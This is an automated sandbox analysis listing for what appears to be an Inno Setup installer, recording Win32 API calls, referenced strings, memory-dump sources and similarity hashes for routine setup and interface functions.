Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: Find$CloseFileNext
• String ID:
• API String ID: 2066263336-0
• Opcode ID: 0b899193b38ae4b4a9f711b903f30aca3397319e452da35565708c6391061ac6
• Instruction ID: d9f5877477ad4919a51ea01a6ce133d6d52d68eb085124448875bfa655ef3505
• Opcode Fuzzy Hash: 0b899193b38ae4b4a9f711b903f30aca3397319e452da35565708c6391061ac6
• Instruction Fuzzy Hash: 05514071900649EFCB11DFA6CC45ADEB7B8EB48319F1085EAA808E7351E6389F45CF54
APIs
• GetMenu.USER32(00000000), ref: 00421371
• SetMenu.USER32(00000000,00000000), ref: 0042138E
• SetMenu.USER32(00000000,00000000), ref: 004213C3
• SetMenu.USER32(00000000,00000000), ref: 004213DF
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: Menu
• String ID:
• API String ID: 3711407533-0
• Opcode ID: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
• Instruction ID: d5697da4fc95676b4ee4b3549606d87e5ebc590dd77dbca5d1b8da67126da037
• Opcode Fuzzy Hash: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
• Instruction Fuzzy Hash: D041A13070025447EB20EA79A88579B26965F69318F4805BFFC44DF3A3CA7DCC45839D

APIs
• SendMessageA.USER32(?,?,?,?), ref: 00416B94
• SetTextColor.GDI32(?,00000000), ref: 00416BAE
• SetBkColor.GDI32(?,00000000), ref: 00416BC8
• CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: Color$CallMessageProcSendTextWindow
• String ID:
• API String ID: 601730667-0
• Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
• Instruction ID: 7a78515b3e46194db8101330e18da160614de8b80347fcfd5663145ee8fb6c7e
• Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
• Instruction Fuzzy Hash: 27115EB6600A04AFC710EE6ECC84E8773ECDF48314715883EB59ADB612D638F8418B69

APIs
• WaitForInputIdle.USER32(?,00000032), ref: 004544C4
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004544E6
• GetExitCodeProcess.KERNEL32(?,?), ref: 004544F5
• CloseHandle.KERNEL32(?,00454522,0045451B,?,?,?,00000000,?,?,004546F7,?,?,?,00000044,00000000,00000000), ref: 00454515
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
• String ID:
• API String ID: 4071923889-0
• Opcode ID: 92cad1b1623a520deb2a60ceab2f66088d33f5f9fd8daf829ec97aba04c0730e
• Instruction ID: 9fcdfe959295c415b2919edefc4bc283a9fb09ec36d5bd5c2e1fe4b9dd3ee853
• Opcode Fuzzy Hash: 92cad1b1623a520deb2a60ceab2f66088d33f5f9fd8daf829ec97aba04c0730e
• Instruction Fuzzy Hash: D601B9706406087EEB2097A58C06F6B7BACDB85778F510567FA04DB2C2D9B89D408668

APIs
• 73A1A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
• EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
• 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
• 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: A24620A480A570EnumFonts
• String ID:
• API String ID: 2630238358-0
• Opcode ID: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
• Instruction ID: 16e9332b6476af0d686f12fa818e5571f82757a24bc5219822a197079b30e1ec
• Opcode Fuzzy Hash: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
• Instruction Fuzzy Hash: D80192717447106AE710BF7A5C86B9B36649F04719F40427BF804AF2C7D6BE9C05476E

APIs
  • Part of subcall function 0044FF8C: SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
• FlushFileBuffers.KERNEL32(?), ref: 0045BBB9
Strings
• EndOffset range exceeded, xrefs: 0045BAED
• NumRecs range exceeded, xrefs: 0045BAB6
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: File$BuffersFlush
• String ID: EndOffset range exceeded$NumRecs range exceeded
• API String ID: 3593489403-659731555
• Opcode ID: 3ef1d8ef2fe27ab35db507c607b793a342be7aaea3f0012d498e32cd40a9735a
• Instruction ID: f2711acf26be03df24c87a4523f52de689b41dfdc4f1b15506e6aedc90e5aeb3
• Opcode Fuzzy Hash: 3ef1d8ef2fe27ab35db507c607b793a342be7aaea3f0012d498e32cd40a9735a
• Instruction Fuzzy Hash: 4761B734A002588BDB25DF15C881ADAB3B5EF49305F0084EAED899B352D7B4AEC8CF54

APIs
  • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,0049707A), ref: 0040334B
  • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,0049707A), ref: 00403356
  • Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00497084), ref: 0040633A
  • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
  • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
  • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
  • Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497084), ref: 0040637E
  • Part of subcall function 00409B88: 6F551CD0.COMCTL32(0049708E), ref: 00409B88
  • Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2
  • Part of subcall function 00419050: GetVersion.KERNEL32(004970A2), ref: 00419050
  • Part of subcall function 0044EF98: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004970B6), ref: 0044EFD3
  • Part of subcall function 0044EF98: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9
  • Part of subcall function 0044F440: GetVersionExA.KERNEL32(0049A790,004970BB), ref: 0044F44F
  • Part of subcall function 00452850: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 00452870
  • Part of subcall function 00452850: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452876
  • Part of subcall function 00452850: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 0045288A
  • Part of subcall function 00452850: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452890
  • Part of subcall function 004562AC: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004562D0
  • Part of subcall function 00463D1C: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004970D9), ref: 00463D2B
  • Part of subcall function 00463D1C: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463D31
  • Part of subcall function 0046BE24: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BE39
  • Part of subcall function 004776C8: GetModuleHandleA.KERNEL32(kernel32.dll,?,004970E3), ref: 004776CE
  • Part of subcall function 004776C8: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004776DB
  • Part of subcall function 004776C8: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004776EB
  • Part of subcall function 00494014: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0049402D
• SetErrorMode.KERNEL32(00000001,00000000,0049712B), ref: 004970FD
  • Part of subcall function 00496E2C: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00497107,00000001,00000000,0049712B), ref: 00496E36
  • Part of subcall function 00496E2C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00496E3C
  • Part of subcall function 004244E4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424503
  • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
• ShowWindow.USER32(?,00000005,00000000,0049712B), ref: 0049715E
  • Part of subcall function 00480B7C: SetActiveWindow.USER32(?), ref: 00480C2A
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF551FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
• String ID: Setup
• API String ID: 3870281231-3839654196
• Opcode ID: 980f61c249789edf80bef623c70ffd76524896e35817f2e47642f40ae8962751
• Instruction ID: ebb0a401c3e664f155299204c0f5f4603c455a0fe39dfd081332d01f58350741
• Opcode Fuzzy Hash: 980f61c249789edf80bef623c70ffd76524896e35817f2e47642f40ae8962751
• Instruction Fuzzy Hash: CE31B4312186409FDA11BBB7ED1391D3BA4EB8971C7A2447FF90482663DE3D58508A6E

APIs
• GetCurrentThreadId.KERNEL32 ref: 0041EF03
• 73A25940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: A25940CurrentThread
• String ID: RzE
• API String ID: 2655091166-1126107055
• Opcode ID: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
• Instruction ID: ec4a18813bd70517abb30b2059a031d9bbc12b7253ca3772a6f1eb51880190fd
• Opcode Fuzzy Hash: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
• Instruction Fuzzy Hash: 42015B75A04708BFD705CF6ADC1195ABBE9E78A720B22C87BEC04D36A0EB345814DE18

APIs
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047B346,00000000,0047B35C,?,?,?,?,00000000), ref: 0047B122
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: Close
• String ID: RegisteredOrganization$RegisteredOwner
• API String ID: 3535843008-1113070880
• Opcode ID: e77b6468a0bbf668d644fb693f5a97652e08946f06f09772adc7615d771fa624
• Instruction ID: c0e5db093c22981a2c4b78a2736f8ddfc80e316131ebabe5fbae1d79ea558dad
• Opcode Fuzzy Hash: e77b6468a0bbf668d644fb693f5a97652e08946f06f09772adc7615d771fa624
• Instruction Fuzzy Hash: F1F0BB70708284ABEB00D675FD92BDB3359D742344F50807BA5149B391D7B99E01D79C

APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474403), ref: 004741F1
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474403), ref: 00474208
  • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: CloseCreateErrorFileHandleLast
• String ID: CreateFile
• API String ID: 2528220319-823142352
• Opcode ID: 285fe29be3b45c5d55921f03afc8078dc8cb5333e8f17a8fd5c0d1f978e05295
• Instruction ID: 58c46c97337ee3450255063b4db4f116026cd25e8145783c5652bdd163bde5c5
• Opcode Fuzzy Hash: 285fe29be3b45c5d55921f03afc8078dc8cb5333e8f17a8fd5c0d1f978e05295
• Instruction Fuzzy Hash: 78E06D342803447FEA10F769DCC6F5A7788AB04768F108152FA58AF3E3C6B9EC408618
                                                                              APIs
                                                                                • Part of subcall function 0045623C: CoInitialize.OLE32(00000000), ref: 00456242
                                                                                • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                              • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004562D0
                                                                              Similarity
                                                                              • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                              • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                              • API String ID: 2906209438-2320870614
                                                                              • Opcode ID: 5f0321f70bc8b65a0e9df3b83bb4349998e588e00924faa4de34c024f66de19b
                                                                              • Instruction ID: 517aaa95fd919f42fec07b3e20ba2fe3b86c01757d5d2d7eeafb2f6c84d6a724
                                                                              • Opcode Fuzzy Hash: 5f0321f70bc8b65a0e9df3b83bb4349998e588e00924faa4de34c024f66de19b
                                                                              • Instruction Fuzzy Hash: 4CC040D074455095CA0077FB540374F14149750717F5180BFB848675C7DF3D440D566E
                                                                              APIs
                                                                                • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                              • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BE39
                                                                              Similarity
                                                                              • API ID: AddressErrorLibraryLoadModeProc
                                                                              • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                              • API String ID: 2492108670-2683653824
                                                                              • Opcode ID: b0d4ed7fe2e6c92240e78bd32e692da4caac8c34d98bb73dc912627f5a414994
                                                                              • Instruction ID: f15142af1028fbda52646c9d138091dcd6bfc2c127db856ea005f68399f83491
                                                                              • Opcode Fuzzy Hash: b0d4ed7fe2e6c92240e78bd32e692da4caac8c34d98bb73dc912627f5a414994
                                                                              • Instruction Fuzzy Hash: 76B092A0B00780C6CE00BBB3A8127871528D740704B10C07F7240EA696FF7E8C458FEE
                                                                              APIs
                                                                              • GetSystemMenu.USER32(00000000,00000000,00000000,00480368), ref: 00480300
                                                                              • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00480311
                                                                              • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00480329
                                                                              Similarity
                                                                              • API ID: Menu$Append$System
                                                                              • String ID:
                                                                              • API String ID: 1489644407-0
                                                                              • Opcode ID: 07804b108b7a0fe67ba00d28aa87a6db0bb0739bb6f9f414250e392156e0bb43
                                                                              • Instruction ID: 04a05a6f5988e1ad1c69e12ed442e821a58669dfeb252773ef60a283987a992a
                                                                              • Opcode Fuzzy Hash: 07804b108b7a0fe67ba00d28aa87a6db0bb0739bb6f9f414250e392156e0bb43
                                                                              • Instruction Fuzzy Hash: 3431B0707043441BD721FB769C8AB9E3A949B1531CF5408BBF800AA3D3CABC9C09879D
                                                                              APIs
                                                                              • 73A1A570.USER32(00000000,?,00000000,00000000,0044ACE1,?,00480B97,?,?), ref: 0044AC55
                                                                              • SelectObject.GDI32(?,00000000), ref: 0044AC78
                                                                              • 73A1A480.USER32(00000000,?,0044ACB8,00000000,0044ACB1,?,00000000,?,00000000,00000000,0044ACE1,?,00480B97,?,?), ref: 0044ACAB
                                                                              Similarity
                                                                              • API ID: A480A570ObjectSelect
                                                                              • String ID:
                                                                              • API String ID: 1230475511-0
                                                                              • Opcode ID: ce16d757fc6e84d8b50fecd4ea510c6835f5a6497dcb8cdd06a43cc5d170f4e8
                                                                              • Instruction ID: 3b5f26ead791ea6387a249f2cdaddc54e41ca9264cf2fbaff888b01415335cc3
                                                                              • Opcode Fuzzy Hash: ce16d757fc6e84d8b50fecd4ea510c6835f5a6497dcb8cdd06a43cc5d170f4e8
                                                                              • Instruction Fuzzy Hash: CA21B670E44248AFEB01DFA5C885B9F7BB9EB48304F41807AF500E7281D77C9950CB6A
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044A9A0,?,00480B97,?,?), ref: 0044A972
                                                                              • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044A985
                                                                              • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044A9B9
                                                                              Similarity
                                                                              • API ID: DrawText$ByteCharMultiWide
                                                                              • String ID:
                                                                              • API String ID: 65125430-0
                                                                              • Opcode ID: ba67a2f4d1841ae75712bddd7de105be3c5bdedf26297cf57516476b8703cb91
                                                                              • Instruction ID: 8b0288b9d3461177b0e2011e4a6e3c0ecae8d00baf86e8e824f1a66b6306016d
                                                                              • Opcode Fuzzy Hash: ba67a2f4d1841ae75712bddd7de105be3c5bdedf26297cf57516476b8703cb91
                                                                              • Instruction Fuzzy Hash: 0E11B6B27446047FEB10DAAA9C82E6FB7ECEB49724F10417BF504E7290D6389E018669
                                                                              APIs
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
                                                                              • TranslateMessage.USER32(?), ref: 0042449F
                                                                              • DispatchMessageA.USER32(?), ref: 004244A9
                                                                              Similarity
                                                                              • API ID: Message$DispatchPeekTranslate
                                                                              • String ID:
                                                                              • API String ID: 4217535847-0
                                                                              • Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                              • Instruction ID: 520fb342982be2dd3794930026bb259c1cd38a4fe19eb968f01b3c53081bdda3
                                                                              • Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                              • Instruction Fuzzy Hash: 781191307043205AEE20FA64AD41B9B73D4DFD1708F80481EF9D997382D77D9E49879A
                                                                              APIs
                                                                              • SetPropA.USER32(00000000,00000000), ref: 0041667A
                                                                              • SetPropA.USER32(00000000,00000000), ref: 0041668F
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166B6
                                                                              Similarity
                                                                              • API ID: Prop$Window
                                                                              • String ID:
                                                                              • API String ID: 3363284559-0
                                                                              • Opcode ID: 51d1e881393928d894513cc5a6715d0f9133524890ebfc277249263b82eead75
                                                                              • Instruction ID: 52b24e3238e4314aade48f96f4600562d70e15a3c995b5dbeb32d15e299d8853
                                                                              • Opcode Fuzzy Hash: 51d1e881393928d894513cc5a6715d0f9133524890ebfc277249263b82eead75
                                                                              • Instruction Fuzzy Hash: 4CF0BD71701220ABEB10AB598C85FA632DCAB09715F16017ABE09EF286C678DC50C7A8
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 0041EE74
                                                                              • IsWindowEnabled.USER32(?), ref: 0041EE7E
                                                                              • EnableWindow.USER32(?,00000000), ref: 0041EEA4
                                                                              Similarity
                                                                              • API ID: Window$EnableEnabledVisible
                                                                              • String ID:
                                                                              • API String ID: 3234591441-0
                                                                              • Opcode ID: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
                                                                              • Instruction ID: 4e94e345e4a8e87798afb8fb42df504bf5387c41ee1a2ac16dc0d48b177cce37
                                                                              • Opcode Fuzzy Hash: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
                                                                              • Instruction Fuzzy Hash: 4DE0EDB8100304AAE750AB2BEC81A57769CBB55314F49843BAC099B293DA3ED8449A78
                                                                              APIs
                                                                              • SetActiveWindow.USER32(?), ref: 00480C2A
                                                                              Similarity
                                                                              • API ID: ActiveWindow
                                                                              • String ID: InitializeWizard
                                                                              • API String ID: 2558294473-2356795471
                                                                              • Opcode ID: 723738b8fbe3fabf7eb5c80f16a5b290c90bba58ac79f9736125b6795bdc7b1c
                                                                              • Instruction ID: 7183a9f40d151cc4564f9c637f0f3a65215fdab84d47651bf6ef09736f3ca39c
                                                                              • Opcode Fuzzy Hash: 723738b8fbe3fabf7eb5c80f16a5b290c90bba58ac79f9736125b6795bdc7b1c
                                                                              • Instruction Fuzzy Hash: C511C1302142049FD754EB6AFD82B0A7BA8E716728F10447BE810C77A1EB79AC64C79D
                                                                              APIs
                                                                                • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047B222,00000000,0047B35C), ref: 0047B021
                                                                              Strings
                                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047AFF1
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                              • API String ID: 47109696-1019749484
                                                                              APIs
                                                                              • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00474FCB,0049B178,?,0046E183,?,00000000,0046E6DA,?,_is1), ref: 0046DE8F
                                                                              Strings
                                                                              • Inno Setup: Setup Version, xrefs: 0046DE8D
                                                                              Similarity
                                                                              • API ID: Value
                                                                              • String ID: Inno Setup: Setup Version
                                                                              • API String ID: 3702945584-4166306022
                                                                              APIs
                                                                              • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046E544,?,?,00000000,0046E6DA,?,_is1,?), ref: 0046DEEF
                                                                              Similarity
                                                                              • API ID: Value
                                                                              • String ID: NoModify
                                                                              • API String ID: 3702945584-1699962838
                                                                              APIs
                                                                              • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                              Strings
                                                                              • System\CurrentControlSet\Control\Windows, xrefs: 0042DD5E
                                                                              Similarity
                                                                              • API ID: Open
                                                                              • String ID: System\CurrentControlSet\Control\Windows
                                                                              • API String ID: 71445658-1109719901
                                                                              APIs
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,0045386F,?,00000000,004538D9,?,?,-00000001,00000000,?,0047B861,00000000,0047B7B0,00000000), ref: 0045384B
                                                                              • FindClose.KERNEL32(000000FF,00453876,0045386F,?,00000000,004538D9,?,?,-00000001,00000000,?,0047B861,00000000,0047B7B0,00000000,00000001), ref: 00453869
                                                                              Similarity
                                                                              • API ID: Find$CloseFileNext
                                                                              • String ID:
                                                                              • API String ID: 2066263336-0
                                                                              APIs
                                                                              • GetACP.KERNEL32(?,?,00000001,00000000,0047CC8B,?,-0000001A,0047EBEA,-00000010,?,00000004,0000001A,00000000,0047EF37,?,0045D288), ref: 0047CA22
                                                                                • Part of subcall function 0042E244: 73A1A570.USER32(00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A), ref: 0042E253
